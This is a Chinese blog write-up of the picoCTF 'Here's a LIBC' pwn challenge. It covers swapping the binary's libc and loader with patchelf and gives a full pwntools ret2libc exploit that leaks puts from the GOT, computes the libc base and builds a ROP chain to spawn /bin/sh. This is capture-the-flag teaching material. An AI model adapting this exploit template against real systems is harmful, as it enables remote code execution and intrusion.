picoCTF pwn wp - Here‘s a LIBC

最新推荐文章于 2023-02-10 11:09:43 发布
最新推荐文章于 2023-02-10 11:09:43 发布
阅读量364 收藏 1
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/118072322
版权

在这里插入图片描述

在这里插入图片描述

直接运行不正确, 需要更换ld文件

在这里插入图片描述

libc版本是2.27的, 所以ld文件需要匹配成2.27的
glibc-all-in-one下载debug组件, 里边有ld文件, 拷贝过去

在这里插入图片描述

用patchelf命令执行libc和ld文件的替换操作

patchelf --replace-needed libc.so.6 ./libc.so.6 ./alibc
patchelf --set-interpreter ./ld-2.27.so ./alibc

在这里插入图片描述

然后就能正常运行
在这里插入图片描述

在这里插入图片描述

栈溢出, ret2libc, 构造ROP调用system("/bin/sh")

在这里插入图片描述

这里第二次进main是没有初始化栈结构的, 所以Ubuntu18.04以后的系统因为有栈平衡机制的存在, 由调用者平衡栈, 导致需要在payload2处rop链前增加一个ret操作, 实现栈平衡, 再调用system("/bin/sh")

from pwn import *
from pwnlib import context
from pwnlib.util.cyclic import cyclic

context.log_level = "debug"
URL, PORT = "mercury.picoctf.net", 23584 
sel = 0
io = process("./alibc") if sel == 0 else remote(URL, PORT)
elf = ELF("./alibc")
libc = ELF("./libc.so.6")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pad = 0x80 + 8 
main_addr = elf.symbols['main']
pop_rdi_addr = 0x0000000000400913
ret_addr = 0x000000000040052e
puts_libc = libc.symbols['puts']
sys_symbols = libc.symbols['system']
binsh_symbols = next(libc.search(b'/bin/sh'))

payload1 = cyclic(pad) + p64(pop_rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter("WeLcOmE To mY EcHo sErVeR!\n", payload1)
io.recvline()
puts_addr = u64(io.recvline().strip().ljust(8, b'\x00'))
log.info(puts_addr)

libc_base = puts_addr - puts_libc
sys_addr = libc_base + sys_symbols 
binsh_addr = libc_base + binsh_symbols

payload2 = cyclic(pad) + p64(ret_addr) +  p64(pop_rdi_addr) + p64(binsh_addr) + p64(sys_addr)
io.sendlineafter("WeLcOmE To mY EcHo sErVeR!\n", payload2)
io.interactive()

在这里插入图片描述


总结

接收泄露的地址, 代码板子

leak_addr = u64(io.recvline().strip().ljust(8, b"\x00"))

更换libc版本, 需要更换libc和相应版本的ld文件

  • libc
  • ld
patchelf --replace-needed libc.so.6 [path to libc] ./file
patchelf --set-interpreter [path to ld] ./file
fa1c4
关注
专栏目录
adworld攻防世界-pwn-新手区-wp
令则
03-05 1179
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
pwn】攻防世界 pwn新手区wp
woodwhale的博客
08-10 7283
pwn】攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
picoCTF,General Skills,基本技能类,34/34
Allezima阿力代码
12-28 2047
自己做的CTF,记录一下。后期不断编辑。
pwn更换libc的方法
doudoudedi
08-05 1890
是不是常常为pwn的不同ubuntu环境而困扰 )小声我也是 这里分享一个patchelf的方法 首先下载patchelf然后执行着2条即可以 import os os.system("patchelf --set-interpreter /libc-ld.so/{} ./pwn1").format(your_input)#这里是将链接器准备好 os.system("patchelf --set-rpath /libc-ld.so/{} ./pwn1").format()#这里是将libc文件加载上
PWN 更换目标程序libc
yongbaoii的博客
12-29 4891
网上这方面我感觉还是比较少的,在这里把我的方法拿出来防止大家踩坑。 这一块知识不大懂的推荐去看《程序员的自我修养》第八章共享库那一章节。 我们换libc的原因是在调试程序的时候我们本地的libc可能跟远程计算机上的libc不一样,不是可能,基本上都不一样,那么我们程序加载libc之后里面的一些函数的偏移地址就会跟我们想的不一样,从而导致脚本不停出错。那么就需要我们去把程序所链接的libc从本地libc更换成远程服务器上的libc。 原理简单的说就是用patchelf把程序依赖libc的那个软连接改一下,或者
picoCTF pwn wp - Guessing Game 1
fa1c4的blog
06-26 276
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #define BUFSIZE 100 long increment(long in) { return in + 1; } long get_random() { return rand() % BUFSIZE; } int d
picoCTF,Binary Exploitation,二进制类,23/37
Allezima阿力代码
02-10 1207
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
pwn题堆利用的一些姿势 -- malloc_hook
lifanxin的博客
04-12 4357
  在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell。因此也就有了我这一系列文章的目的,在got表无法被修改时,我们往往利用的就是下面的一些hook+one
pwn】2021 祥云杯 (部分)
woodwhale的博客
10-07 4231
pwn】2021 祥云杯 (部分) 前言 国庆的最后几天,一直在补题,发现祥云杯那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云杯里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1107
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
2021 Picoctf pwn部分wp
weixin_46521144的博客
07-18 537
首先说一下,是参考了校内学长的复盘讲解hhh,这也是第一次直接接触在线的ctf而不是靶场。 Gauntlet1 在ida里面看一下。这三道Gauntlet都是一个类型的,漏洞都是一个格式化字符串+栈溢出。 那就很容易直接把shellcraft.sh()写道栈上,因为一开始给打印了背写区域的起始位置并且使可执行的栈,一溢出就会跳转到我们写的shellcraft上面执行。注意中间还要有个格式化字符串的额send,不要忘了,之前卡在这里好久啊。。。 exp from pwn import * context.
CTF pwn中利用pwntools加载不同版本libc调试程序的方法
Assassin
04-09 4953
在网上找到了很多加载libc的帖子,终于自己走通了一次,现在把方法和资源都整理一下 一、解决方案 python利用pwntools的代码 from pwn import * import pwnlib context(os='linux',arch='amd64',log_level='debug') if __name__ == '__main__': conn = process(['./ld-2.23.so','./pwn'], env = {'LD_PRELOAD' : './libc-2.2
pwn学习笔记(一)
qq_41560595的博客
03-18 1576
ret2text: 程序中提供了后门函数,自己复写返回地址为后门函数地址。 .bss 、.data、.text三个段是elf文件在磁盘上本来就有的文件,进入到内存后仍然存在。PIE影响这三个部分。
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1630
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
glibc更换(patchelf方法)
qq_45595732的博客
04-01 5724
获取不同版本glibc版本方法 这里使用自动化工具 https://github.com/matrix1001/glibc-all-in-one 使用方法也很简单 先./update_list获取glibc列表 cat查看可以下载的glibc版本 $ cat list 2.23-0ubuntu11.2_amd64 2.23-0ubuntu11.2_i386 2.23-0ubuntu3_amd64 2.23-0ubuntu3_i386 2.27-3ubuntu1.2_amd64 2.27-3ubuntu1.2
【kali】 glibc-all-in-one安装 (解决version `GLIBC_2.34‘ not found)
热门推荐
weixin_49764009的博客
05-25 2万+
glibc-all-in-one glibc-all-in-one下载 sudo git clone https://github.com/matrix1001/glibc-all-in-one.git #也可以自行去官网下载然后解压 cd glibc-all-in-one/ glibc-all-in-one安装 sudo python3 update_list [+] Common list has been save to "list" [+] Old-release list has been sa
GNU-ld链接脚本浅析
李永刚的专栏
09-02 3069
GNU-ld链接脚本浅析 0. Contents1. 概论2. 基本概念3. 脚本格式4. 简单例子5. 简单脚本命令6. 对符号的赋值7. SECTIONS命令8. MEMORY命令9. PHDRS命令10. VERSION命令11. 脚本内的表达式12. 暗含的连接脚本1. 概论每一个链接过程都由链接脚
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1614
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
linux libc 2.23.so,IDA正确加载libc.so等动态库的调试信息
weixin_42550750的博客
05-13 1492
一、问题分析在动态调试程序的时候,用gdb调试到libc的时候能正确加载符号信息,但同样的程序用IDA调试到libc的时候却缺失了libc中的许多符号,而且对应生成的伪代码可读性极差这其实是IDA没有正确加载DWARF调试信息所导致的解决方法是用objcopy把.gnu_debuglink段的内容从libc-2.23.so改成其他名字,比如libc-2.23.so.debug,再把.debug文件...
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值